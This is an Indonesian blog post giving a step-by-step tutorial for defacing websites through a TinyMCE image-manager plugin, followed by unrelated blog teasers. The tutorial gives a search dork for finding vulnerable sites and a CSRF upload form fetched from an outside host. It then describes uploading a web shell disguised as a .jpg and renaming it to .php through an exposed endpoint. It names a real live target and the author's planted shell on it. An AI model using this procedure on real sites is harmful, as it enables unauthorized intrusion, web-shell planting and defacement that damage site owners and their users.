Tutorial Deface Dengan Cara TinyMce Plugins Image Manager

Sebenarnya tutorial deface ini udh ada dari lama, cuman karna sibuk sama real life jadi ga sempet nulis tutorial

Ok kali ini gw share deface POC TinyMce Plugins Image Manager
caranya cukup mudah, , siapkan dulu shell yang ber extensi .jpg

Ok langsung aja

DORK : inurl:/tinymce/plugins/image/ ( Selebihnya kembangkan sendiri )

Exploit : site.com/(path)/tinymce/plugins/image/upload.php

Live Target : https://www.madisonts.com/js/tinymce/plugins/image/upload.php

1. Kalian dorking dulu ke google, bing atau search engine lainnya, pke dork di atas yg gw kasih

2. site yg vuln seperti ini

Vuln tidak juga ada yg seperti itu, ada juga yg blank seperti ini

3. Selanjutnya salin url nya, upload shell menggunakan CSRF nya ada di sini http://trolling-system.ooo/csrf.txt kalian upload di web dengan nama csrf.php

4. Upload extensi shell .jpg , inget jangan langsung upload ext .php, upload menggunakan csrf di atas yg gw kasih, ubah bagian <form action="site.com" dengan web yg vuln

5. lalu upload shell ext jpg nya, kalau sukses muncul seperti ini

6. Nah kalau muncul sepeti ini salin tulisan FILE-20180702-0754DCWUCH8NHQFC.jpg nah yang kaya gitu

7. Lalu kita disini mengubah shell jpg kita menjadi php, gimana caranya? sans ikutin

http://site.com/[path]/tinymce/plugins/image/rename_file.php?current_name=NAMA-FILE-SHELL-YANG-BERHASIL-DI-UPLOAD.jpg&new_name=namashellbaru.php

Ga ngerti? ok contoh seperti ini

https://www.madisonts.com/js/tinymce/plugins/image/rename_file.php?current_name=FILE-20180702-0754DCWUCH8NHQFC.jpg&new_name=bacot.php

8. kalau success muncul tulisan banyak seperti ini

9. tinggal kita akses deh

akses shell : site.com/[path]/tinymce/plugins/image/uploads/namashellyangbaru.php

look >> https://www.madisonts.com/js/tinymce/plugins/image/uploads/bacot.php nah ini shell gw

mudah bukan? eheheh

ada yang masih kurang ngerti? Jangan ragu untuk bertanya

Ok sekian..

terima kasih sudah berkunjung

Comments

Benner Online Shop CDR / Toko Online Elegan CDR 100% Free

Benner Online Shop/ Toko Online Elegan 100% Free - Bagi anda yang memiliki toko online/online shop dan bingung untuk membuat bennernya, disini kami sajikan contoh benner online shop. benner online shope yang kami bagikan ini adalah benner yang di desain tim desainer kami untuk anda. contoh ini dapat menjadi referensi. dan jika anda membutuhkan file CDRnya anda dapat mengunduhnya pada link yang admin buat di akhir artikel ini. setelah anda mengunduh file CDRnya silahkan di edit sesuai nama online shop anda dengan menggunkan CorelDraw. Sesuai dengan judul yaitu Benner Online Shop/ Toko Online Elegan CDR 100% Free bahwa kami membagikannya secara gratis. jadi bagi yang berminat silahkan di download. berikut adalah contoh benner online shop yang kami maksud. Contoh 1 benner online Shop Contoh 2 benner online Shop Contoh 3 benner online Shop Itulah contoh benner online shop yang dapat kami bagikan, kami berharap contoh diatas dapat mewakili kebutuhan anda. jika anda ingin re...

Memperbaiki Error Page Contains Property "BlogId" And "postID" Is Not Part Of Schema

Memperbaiki Error Page Contains Property "BlogId" And "postID" Is Not Part Of Schema Written by Muhamad Hamdan on Wen March 5th 2014 Assalamu'Alaikum Sahabat Semua,Dua Minggu yang lalu kita pernah Membikin Artikel bagaimana cara Memperbaiki Missing required field "updated" Dan hCard "author" Mereka yang telah melihat artikel tadi pasti sudah valid kalau Dia mengikuti petunjuknya,Tetapi walaupun itu sudah valid untuk menggunakan rich snippets untuk google webmasters tools, Sebagian besar suka menemukan Error Page Contains Property "BlogId" And "postID" Is Not Part Of Schema di karenakan dari kesalahan property yang bukan schema markup. Nah sekarang untuk melanjutkan dengan cara Memperbaiki Error Page Contains Property "BlogId" And "postID" Is Not Part Of Schema Anda perlu bantuan d...

Cara mendapatkan Dollar dari situs Survey Mobrog.com

Hallo Brada, Diartikel ke tiga puluh satu ini, Saya akan memberikan Tutorial Cara bermain Mobrog hingga mendapatkan Dollar. Mobrog adalah situs Survey Online yang bisa menghasilkan Uang berupa Dollar secara gratis dan mudah. Mobrog merupakan layanan yang disediakan oleh perusahaan riset pasar SPLENDID RESEARCH GmbH dari Jerman. Situs ini sudah termasuk situs Survey online terpercaya, sudah banyak orang yang pernah Withdraw dari Mobrog. Survey ini sudah berada diseluruh dunia, termasuk Indonesia. Cara mendapatkan Dollar di Mobrog Sebelumnya Anda harus menyiapkan Smartphone/PC, Koneksi Internet, Email aktif, dan Wallet PayPal. Jika sudah menyiapkan alat dan bahan yang diperlukan diatas, silahkan melanjutkan membaca Tutorial ini. 1. Pertama, silahkan Anda membuat akun terlebih dahulu disini . 2. Kedua, lengkapi Formulir pendaftaran yang diminta. Isilah Formulir pendaftaran dengan benar sesuai data Anda, jika sudah klik " i agree to... " dan pilih " Register ". 3. Ketig...

Tekno

Search This Blog